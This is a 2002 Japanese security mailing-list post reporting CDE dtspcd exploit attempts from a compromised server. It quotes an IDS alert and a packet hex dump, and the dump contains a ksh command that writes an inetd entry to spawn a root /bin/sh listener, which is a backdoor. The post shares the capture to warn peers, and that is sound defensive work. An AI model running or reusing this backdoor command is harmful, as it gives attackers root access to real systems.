[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:01188] CDE DTSPCD EXPLOIT

To: SecurityTalk <security-talk@xxxxxxxxxxxxxxxxxxxx>
Subject: [stalk:01188] CDE DTSPCD EXPLOIT
From: MICKY <micky@xxxxxxxxx>
Date: Mon, 18 Feb 2002 10:06:15 +0900



ども。犬のみっきーです。

週末に、ドイツの可愛そうな踏み台WEBサーバから集中的にCDE dtspcd exploit
を受けました。

実際に被害が出ているかどうかはこれから確認します。

皆様のところもお気をつけあれ。

2002-02-17 08:16:57
CVE] [url] EXPERIMENTAL CDE dtspcd exploit attempt 

4f0 : C0 23 FF EC 82 10 20 0B 91 D0 20 08 2F 62 69 6E   .#.... ... ./bin
500 : 2F 6B 73 68 20 20 20 20 2D 63 20 20 65 63 68 6F   /ksh    -c  echo
510 : 20 27 72 6A 65 20 73 74 72 65 61 6D 20 74 63 70    'rje stream tcp
520 : 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 2F 62 69    nowait root /bi
530 : 6E 2F 73 68 20 73 68 20 2D 69 27 3E 2F 74 6D 70   n/sh sh -i'>/tmp
540 : 2F 7A 3B 2F 75 73 72 2F 73 62 69 6E 2F 69 6E 65   /z;/usr/sbin/ine
550 : 74 64 20 2D 73 20 2F 74 6D 70 2F 7A 3B 73 6C 65   td -s /tmp/z;sle
560 : 65 70 20 31 30 3B 41 41 41 41 41 41 41 41 41 41   ep 10;AAAAAAAAAA


>----- みっきーのネットワーク研究所 ------------<
>  http://www.hawkeye.ac/micky                  <
>  所長：犬のみっきー <micky@xxxxxxxxx>         <
>  pgp : http://www.hawkeye.ac/micky/micky.pub  <
>-----------------------------------------------<

--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
　　　　　　　　　　　　ムズムズ→ハックション！
　　 http://tenki.www.infoseek.co.jp/indx/indx_kafun.html?svx=971122

Prev by Date: [stalk:01187] Re: chkrootkit
Next by Date: [stalk:01189] Re: [MIV] etc.
Previous by thread: [stalk:01187] Re: chkrootkit
Next by thread: [stalk:01191] SnortFE
Index(es):
- Date
- Thread